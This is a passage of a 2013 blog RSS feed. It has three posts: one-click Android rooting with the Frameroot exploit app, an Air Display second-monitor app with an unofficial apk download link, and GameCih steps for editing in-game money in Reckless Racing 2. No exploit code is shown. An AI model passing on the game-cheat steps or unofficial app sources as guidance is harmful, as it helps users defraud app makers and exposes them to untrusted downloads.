automatically.&lt;/div&gt;&lt;blockquote style="background-color: #f3f3f3; border-left-color: rgb(232, 232, 232); border-left-style: solid; border-width: 0px 0px 0px 5px; color: #555555; font-family: Verdana, sans-serif; font-size: 13px; font-style: italic; line-height: 20.796875px; margin: 10px 0px 10px 20px; padding: 0px 15px; text-align: justify;"&gt;&lt;div style="background-color: transparent; border: 1px; line-height: 20px; margin-bottom: 5px; padding: 6px 0px;"&gt;Rooting may cause hardware damage and may even lose warranty, prior to use at your own risk.&lt;/div&gt;&lt;/blockquote&gt;&lt;h2 style="background-color: white; border: 0px; color: #333333; font-family: Verdana, sans-serif; font-size: 18px; line-height: 38px; margin: 0px; padding: 0px; text-align: justify;"&gt;Root Android By Frameroot&lt;/h2&gt;&lt;div style="background-color: white; border: 1px; color: #333333; font-family: Verdana, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 5px; padding: 6px 0px; text-align: justify;"&gt;Download&amp;nbsp;&lt;a href="http://forum.xda-developers.com/showthread.php?t=2130276" rel="external nofollow" style="background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; color: #2266aa; margin: 0px; padding: 0px; text-decoration: none;" target="_blank"&gt;Frameroot apk&lt;/a&gt;&amp;nbsp;from XDA&amp;nbsp;developers&amp;nbsp;forum and installed in the devices itself. Open the Frameroot app once installed, select one of exploit list to be use to root here.&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://sites.google.com/a/wongsk.twbbs.org/wongsk/2013-techgravy/Root%20android-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="640" src="https://sites.google.com/a/wongsk.twbbs.org/wongsk/2013-techgravy/Root%20android-1.png" width="403" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="background-color: white; border: 1px; color: #333333; font-family: Verdana, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 5px; padding: 6px 0px; text-align: justify;"&gt;Once the exploit selected, the device would be rooted and you would see a possible case message ‘Failed. Try another exploit if available’ or&lt;/div&gt;&lt;div style="background-color: white; border: 1px; color: #333333; font-family: Verdana, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 5px; padding: 6px 0px; text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://sites.google.com/a/wongsk.twbbs.org/wongsk/2013-techgravy/Root%20android-3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="https://sites.google.com/a/wongsk.twbbs.org/wongsk/2013-techgravy/Root%20android-3.png" width="203" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="background-color: white; border: 1px; color: #333333; font-family: Verdana, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 5px; padding: 6px 0px; text-align: justify;"&gt;‘Superuser and SU&amp;nbsp;&lt;span class="IL_AD" id="IL_AD1" style="background-attachment: scroll !important; background-image: none !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(27, 142, 222) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; border-left-width: 0px; border-right-width: 0px; border-top-width: 0px; color: rgb(27, 142, 222) !important; cursor: pointer !important; display: inline !important; float: none !important; margin: 0px; padding: 0px 0px 1px !important; position: static;"&gt;binary&lt;/span&gt;&amp;nbsp;installed. You have to reboot your device’. Now reboot your device and it would take a longer time installed files trying to root the device.&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://sites.google.com/a/wongsk.twbbs.org/wongsk/2013-techgravy/Root%20android-4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="https://sites.google.com/a/wongsk.twbbs.org/wongsk/2013-techgravy/Root%20android-4.png" width="189" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="background-color: white; border: 1px; color: #333333; font-family: Verdana, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 5px; padding: 6px 0px; text-align: justify;"&gt;To ensure that the rooting is done by install root checker app that available from Google Play Store.&lt;/div&gt;&lt;div style="background-color: white; border: 1px; color: #333333; font-family: Verdana, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 5px; padding: 6px 0px; text-align: justify;"&gt;You can go back unroot status easily by select ‘Unroot’ from the list.&lt;/div&gt;&lt;div style="background-color: white; border: 1px; color: #333333; font-family: Verdana, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 5px; padding: 6px 0px; text-align: justify;"&gt;Downloads links are here&lt;/div&gt;&lt;div style="background-color: white; border: 1px; color: #333333; font-family: Verdana, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 5px; padding: 6px 0px; text-align: justify;"&gt;&lt;a href="http://forum.xda-developers.com/attachment.php?attachmentid=2293503&amp;amp;d=1380569629" target="_blank"&gt;Frameroot1.6.1&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><enclosure length="929956" type="application/octet-stream" url="http://forum.xda-developers.com/attachment.php?attachmentid=2293503&amp;amp;d=1380569629"/><itunes:explicit>no</itunes:explicit><itunes:subtitle>How To Root Android In One Click And UnrootMost of android users would like to root their devices to get full advantage of the interface butroot Android&amp;nbsp;is not an easy job and risky that the devices may get bricked in worst case. A member from XDA&amp;nbsp;developers&amp;nbsp;forum, Alephzain has released&amp;nbsp;root android&amp;nbsp;app called Frameroot which would help in rooting the device.Frameroot&amp;nbsp;root&amp;nbsp;android apk&amp;nbsp;let users rooting their devices in&amp;nbsp;one click&amp;nbsp;through some exploit such as Gandalf, Pippin and others. The rooting process running without connected to computer and just install Frameroot apk into&amp;nbsp;phone and&amp;nbsp;run it, the app will root the devices automatically.Rooting may cause hardware damage and may even lose warranty, prior to use at your own risk.Root Android By FramerootDownload&amp;nbsp;Frameroot apk&amp;nbsp;from XDA&amp;nbsp;developers&amp;nbsp;forum and installed in the devices itself. Open the Frameroot app once installed, select one of exploit list to be use to root here. Once the exploit selected, the device would be rooted and you would see a possible case message ‘Failed. Try another exploit if available’ or ‘Superuser and SU&amp;nbsp;binary&amp;nbsp;installed. You have to reboot your device’. Now reboot your device and it would take a longer time installed files trying to root the device.To ensure that the rooting is done by install root checker app that available from Google Play Store.You can go back unroot status easily by select ‘Unroot’ from the list.Downloads links are hereFrameroot1.6.1</itunes:subtitle><itunes:author>noreply@blogger.com (Anonymous)</itunes:author><itunes:summary>How To Root Android In One Click And UnrootMost of android users would like to root their devices to get full advantage of the interface butroot Android&amp;nbsp;is not an easy job and risky that the devices may get bricked in worst case. A member from XDA&amp;nbsp;developers&amp;nbsp;forum, Alephzain has released&amp;nbsp;root android&amp;nbsp;app called Frameroot which would help in rooting the device.Frameroot&amp;nbsp;root&amp;nbsp;android apk&amp;nbsp;let users rooting their devices in&amp;nbsp;one click&amp;nbsp;through some exploit such as Gandalf, Pippin and others. The rooting process running without connected to computer and just install Frameroot apk into&amp;nbsp;phone and&amp;nbsp;run it, the app will root the devices automatically.Rooting may cause hardware damage and may even lose warranty, prior to use at your own risk.Root Android By FramerootDownload&amp;nbsp;Frameroot apk&amp;nbsp;from XDA&amp;nbsp;developers&amp;nbsp;forum and installed in the devices itself. Open the Frameroot app once installed, select one of exploit list to be use to root here. Once the exploit selected, the device would be rooted and you would see a possible case message ‘Failed. Try another exploit if available’ or ‘Superuser and SU&amp;nbsp;binary&amp;nbsp;installed. You have to reboot your device’. Now reboot your device and it would take a longer time installed files trying to root the device.To ensure that the rooting is done by install root checker app that available from Google Play Store.You can go back unroot status easily by select ‘Unroot’ from the list.Downloads links are hereFrameroot1.6.1</itunes:summary><itunes:keywords>Hacking</itunes:keywords></item><item><title>Airdisplay : Android as a second monitor for you PC</title><link>http://bambahacks.blogspot.com/2013/10/airdisplay-android-as-second-monitor.html</link><category>Android</category><author>noreply@blogger.com (Anonymous)</author><pubDate>Thu, 17 Oct 2013 23:45:00 -0700</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-4670434626441035720.post-8995382796015854101</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;Now that's time I have a surprise for you .You always wanna be a second monitor for your PC or Lappy .&lt;br /&gt;Solution is Airdisplay....&lt;br /&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;&lt;div class="heading" style="background-color: whitesmoke; border: 0px; font-family: Roboto, Arial, sans-serif; font-size: 28px; margin: 0px 0px 10px; padding: 0px;"&gt;&lt;span style="color: #3d85c6;"&gt;Airdisplay: Description&lt;/span&gt;&lt;/div&gt;&lt;div class="show-more-content text-body" itemprop="description" style="background-color: whitesmoke; border: 0px; color: #333333; font-family: Roboto, Arial, sans-serif; font-size: 14px; line-height: 20px; margin: 0px; max-height: none; overflow: hidden; padding: 0px; position: relative;"&gt;&lt;div class="app-orig-desc" style="border: 0px; margin: 0px; padding: 0px;"&gt;Ever wish you had an extra display for your Mac or Windows computer? There's an app for that. With Air Display, you can use your Android screen as a wireless display, to extend your computer desktop. In order for Air Display to work, your computer and Android device must be connected to the same Wi-Fi network.&lt;br /&gt;&lt;div style="border: 0px; margin-bottom: 5px; padding: 0px;"&gt;Like a wired monitor, Air Display works in two ways:&lt;br /&gt;(1) Extend your computer screen onto a second screen, or&lt;br /&gt;(2) Mirror the contents of your computer screen onto your Android screen.&lt;/div&gt;&lt;div style="border: 0px; margin-bottom: 5px; padding: 0px;"&gt;Air Display's performance is extremely responsive, employing a unique dynamic compression algorithm. On a typical Wi-Fi network, mouse cursor refreshes are indistinguishable from a wired mouse. Air Display works in both landscape and portrait configurations. Just rotate your screen, and it automatically reconfigures. Air Display makes a laptop much more useful by increasing its usable screen size.&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://screenshots.en.sftcdn.net/en/scrn/6654000/6654429/air-display-connect-04-700x426.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://screenshots.en.sftcdn.net/en/scrn/6654000/6654429/air-display-connect-04-700x426.png" height="194" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="border: 0px; margin-bottom: 5px; padding: 0px;"&gt;Air Display not only gives you a wireless computer screen extender or mirror, but also works as a tablet input device. You can use your finger to draw directly on the screen's surface. Try it with a calculator, painting tool, or music control surface. Simple gestures allow you to operate the right mouse button and scroll wheel. When you rotate the screen, or disconnect and reconnect, your windows are automatically repositioned appropriately, so you don't have to drag them back to the Android screen.&lt;/div&gt;&lt;div style="border: 0px; margin-bottom: 5px; padding: 0px;"&gt;Some great uses for Air Display include:&lt;/div&gt;&lt;div style="border: 0px; margin-bottom: 5px; padding: 0px;"&gt;- Fill your Air Display screen with your utility apps such as iChat, Mail, iCal, and Calculator.&lt;br /&gt;- Graphic design: Make Photoshop and Illustrator usable on your laptop by putting your tool palettes on the Android screen.&lt;br /&gt;- Music: Use your Android screen as a wireless control surface for Logic or Pro Tools.&lt;br /&gt;- Programming: Use the extra display area for such auxiliary development tools as Console, Terminal, and the Debugger.&lt;br /&gt;- Business: Move all of your iWork and Office palettes and inspector windows onto Air Display, and let your document fill the screen.&lt;/div&gt;&lt;div style="border: 0px; margin-bottom: 5px; padding: 0px;"&gt;Air Display apk links:::: &amp;nbsp; :::: &amp;nbsp; &amp;nbsp;&amp;nbsp;&lt;a href="http://ulozto.net/xqsnVBS/air-display-v1-5-3-apk" target="_blank"&gt;http://ulozto.net/xqsnVBS/air-display-v1-5-3-apk&lt;/a&gt;&lt;/div&gt;&lt;div style="border: 0px; margin-bottom: 5px; padding: 0px;"&gt;Air Display Wwindow Installer File::::::::::::::: &amp;nbsp;&amp;nbsp;&lt;a href="http://avatron.com/apps/air-display/download/win" target="_blank"&gt;http://avatron.com/apps/air-display/download/win&lt;/a&gt;&lt;/div&gt;&lt;div style="border: 0px; margin-bottom: 5px; padding: 0px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="border: 0px; margin-bottom: 5px; padding: 0px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="border: 0px; margin-bottom: 5px; padding: 0px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="border: 0px; margin-bottom: 5px; padding: 0px;"&gt;Have a fun..........&lt;/div&gt;&lt;div style="border: 0px; margin-bottom: 5px; padding: 0px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="border: 0px; margin-bottom: 5px; padding: 0px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="border: 0px; margin-bottom: 5px; padding: 0px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>Reckless Racing 2 Android Money Hack</title><link>http://bambahacks.blogspot.com/2013/10/reckless-racing-2-android-money-hack.html</link><category>Android</category><author>noreply@blogger.com (Anonymous)</author><pubDate>Wed, 16 Oct 2013 03:59:00 -0700</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-4670434626441035720.post-7019326429060787203</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;h2 style="text-align: left;"&gt;
 &amp;nbsp;Reckless Racing 2 Android Money Hack&lt;/h2&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFrspgDPyMn0ggSl7FWNjKxGK4EW2xLm-vqpKYvnZShbzTqOwE6fLlQoltGspF7lHc28R1BqEBCbMn3RtIY-7cVLhGR6OfKFmFJWLFxqL6eNbFa9aKU3li71Wz1c8bZpZq2iN1JdirA88K/s1600/Reckless+Racing.jpg" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFrspgDPyMn0ggSl7FWNjKxGK4EW2xLm-vqpKYvnZShbzTqOwE6fLlQoltGspF7lHc28R1BqEBCbMn3RtIY-7cVLhGR6OfKFmFJWLFxqL6eNbFa9aKU3li71Wz1c8bZpZq2iN1JdirA88K/s400/Reckless+Racing.jpg" height="195" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
App Name: Reckless Racing 2&lt;br /&gt;
App Version: N/A&lt;br /&gt;
Tool Use For Hack: Gamecih&lt;br /&gt;
&lt;br /&gt;
Step.1 Open Your GameCih &amp;nbsp;Input current Money.&lt;br /&gt;
Step.2 Earn Some Money.&lt;br /&gt;
Step.3 Open Your Gamecih Input new (higher) Value&lt;br /&gt;
Step.4 Repeat Step 2 and 3 Until One Value&lt;br /&gt;
Step.5 And U have only one value whatever, enter shop and see your new cash.&lt;/div&gt;
</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFrspgDPyMn0ggSl7FWNjKxGK4EW2xLm-vqpKYvnZShbzTqOwE6fLlQoltGspF7lHc28R1BqEBCbMn3RtIY-7cVLhGR6OfKFmFJWLFxqL6eNbFa9aKU3li71Wz1c8bZpZq2iN1JdirA88K/s72-c/Reckless+Racing.jpg" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item></channel></rss>